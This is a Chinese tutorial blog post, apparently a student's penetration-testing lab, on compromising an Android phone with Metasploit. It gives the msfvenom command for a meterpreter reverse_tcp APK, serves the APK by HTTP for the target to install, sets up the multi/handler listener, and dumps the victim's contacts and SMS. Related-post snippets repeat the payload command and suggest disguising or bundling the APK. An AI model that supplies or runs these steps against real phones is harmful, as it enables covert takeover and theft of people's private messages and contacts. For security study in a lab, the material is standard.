第二天-03-安卓手机的入侵实验

已于 2023-01-02 13:56:41 修改
阅读量3.1k 收藏 28
点赞数 1
分类专栏: 网络安全学习 文章标签: android 网络
于 2022-12-21 19:01:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56414082/article/details/128400752
版权
本文详细介绍了如何在Kali Linux环境下,通过ping测试网络连通性,然后使用msfvenom生成连接Kali的apk,通过HTTP服务将apk发送到安卓设备并安装,最后在Kali上设置监听并执行命令,如查看通讯录。整个过程涉及网络通信、安卓安全和渗透测试技术。
摘要由CSDN通过智能技术生成

安卓手机入侵实验

要求:

电脑主机与手机模拟器或者真机在当前环境下,网络是畅通的,相互之间可以进行通信。

如何进行测试网络环境:

我们首先需要确定IP。

linux通过终端命令 # ip a 或者 #ifconfig

windown下:win加r输入cmd调出终端,使用ipconfig查看ip地址。

kali下:

在这里插入图片描述

Android模拟器下:

在这里插入图片描述

在这里插入图片描述

在安卓真机下:打开wifi

在这里插入图片描述

操作:

知道IP后使用ping命令测试是否可以连通。

终端下命令:

​ ping 目标主机ip

在这里插入图片描述

测试步骤:

可以ping通后开始进行入侵测试:

  1. 使用msfvenom生成一个连接kali主机的apk安卓应用

lhost=192.168.1.10 (这是Kali的IP),lport=4444 (默认4444)端口,1.apk(生成apk的名字)

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk

在这里插入图片描述

home下点开test

apk安卓应用上传到安卓手机

步骤一:kali开启HTTP服务80端口

命令:

​ python3 -m http.server 80

在这里插入图片描述

​ 步骤二:安卓下通过ip访问网站下载

​ 模拟器下有bug可以通过

终端下命令:切换路径 cd /sdcard

开始下载 wget ip/apk文件

真机可以直接浏览器下输入ip地址访问

安卓下载安装完成并且给与程序权限

在这里插入图片描述

​ 3. 回到kali

​ 输入命令启动msfconsole

在这里插入图片描述

  1. 选择工具模块

    命令:

    use exploit/multi/handler

    在这里插入图片描述

    1. 设置攻击载荷

      set payload android/meterpreter/reverse_tcp

在这里插入图片描述

  1. 设置监听方ip地址(kali的IP地址)

    set LHOST ip

    在这里插入图片描述

  2. 设置端口

    set LPORT 4444

    在这里插入图片描述

  3. run运行

  4. 回到安卓点击安装的程序

  5. kali下可以执行操作了

    查看目标安卓手机通讯录:dump_contacts

    在这里插入图片描述

完成后的文件保存在home,目录下

​ 查看目标手机短信 :dump_sms

在这里插入图片描述

至此操作完成

补充:

可以使用help 查看命令帮助

阿凯6666
关注
  • 1
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 875
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
Android 入侵检测
08-09
NULL 博文链接:https://wv1124.iteye.com/blog/2185484
Kali利用Android木马渗透手机(高级篇)
最新发布
ykx9994的博客
06-24 264
msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk。可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。内网渗透,非公网IP上线。上面这张图是目标上线后的样子,当目标上线后我们就可以停止DNS劫持了。
模拟入侵android手机
边缘拼命划水的小陈
03-21 1969
1、android手机虚拟机2、kali系统
使用AhMyth入侵Android智能手机
dl1286670932的博客
10-08 7276
在本教程中,我们将使用一个名为AhMyth的工具,这是一个开源远程访问工具AhMyth,它具有您希望在RAT中看到的许多功能,例如地理位置监控,SMS模块,联系人列表查看器,文件管理器,相机快照,麦克风录音机等等。
android 入侵检测系统,基于行为模式的Android平台入侵检测系统的设计与实现
weixin_35748508的博客
05-28 405
摘要:随着Android平台的流行,针对Android平台的恶意攻击也日益增多。Android系统虽然已经提供了诸如沙箱、Permission机制等安全措施来保证系统安全,但是在巨大商业利益的激励下,无数攻击者针对系统和软件本身漏洞、安全机制漏洞等,对Android用户展开了各种形式的攻击。在这过程中Android系统已经暴露出开放模式、系统漏洞、软件漏洞、permission机制漏洞等严重安全威...
《Metasploit渗透测试指南》命令参考列表
weixin_38169786的博客
08-09 838
1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。 info 展示出制定渗透攻击或模...
用WIN10的Hyper-V虚拟机安装安卓手机android平板模拟器固件:android-x86-64-9.0-r2
05-13
内容概要: 如果你不想在自己的电脑系统上安装乱七八糟的模拟器,那就直接用WIN10自带的Hyper-V虚拟机安装这个固件就行,里面除了谷歌三件套和超级终端这些必须有的APP,就没其它的了,装完就是已经ROOT过的状态,不...
巢湖学院-2022年最新版-安卓 Android 实验报告 共六篇
06-21
每篇实验报告包含实验目的、实验环境、实验内容、实验代码、实验结果与结论、实验心得 六篇实验报告题目如下: 实验1 安装Android运行环境和IDE 实验2 Android常用UI控件 实验3 智能计算器 实验4 打地鼠小游戏 ...
上海建桥学院-移动应用开发-实验报告3-Android数据存储
04-16
实验Android数据存储 一、实验目的及要求 (1) 掌握Android的SharedPreferences的使用 (2) 掌握在Android中使用SQLite的方法 二、实验内容及步骤 任务:根据下述要求实现对应程序 1、 根据所给界面1完成登入...
80与8080端口入侵
11-10
80与8080端口入侵实80与8080
kali攻击手机_kali linux入侵安卓手机
weixin_35930535的博客
12-30 1万+
这里是做次笔记。kali入侵安卓手机的方法和其他的博主方法一样,只是开头对手机的ip进行设置首先,我用的靶机是魅蓝2,对其网络使用静态ip:xxx.xxx.xxx.aaa,“x”是需要对应入侵机的ip,“a”则是没用过的0-255随便输msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root...
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6461
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
Kali 2020:用Metasploit实验入侵自己的安卓手机
热门推荐
askos的博客
11-01 1万+
目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk 2,使用zipzlign对apk进行对齐 zipalign -v 4 t.apk tz
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1592
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
简单的入侵教程
jahn的专栏
10-16 4440
溢出入侵   因为时间的原因我只 介绍下这些漏洞的是如何利用的不介绍他们是怎么产生的至于怎么修补我会提一下的~~~ 在介绍漏洞之前我先介绍几个很不错的扫描软件,毕竟扫描是基础x-san这个扫描软件我想大家不在陌生!!他是一个全方位扫描漏洞的软件,他主要是用于扫描漏洞的,当然其他方面的比如固定端口的扫描,ip的扫描也都是可以的缺点就是速度太慢~~~nmap这个扫描软件功能比较强大!!是居于cmd界面
夏普SH-03E Android手机详细操作指南
夏普SH-03E手机操作手册是一份详细介绍夏普这款Android系统的手机使用指南,适用于购买并希望正确使用该设备的用户。这份手册发布日期为'12.12',它强调了以下关键知识点: 1. 系统兼容性:SH-03E支持W-CDMA和GSM/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值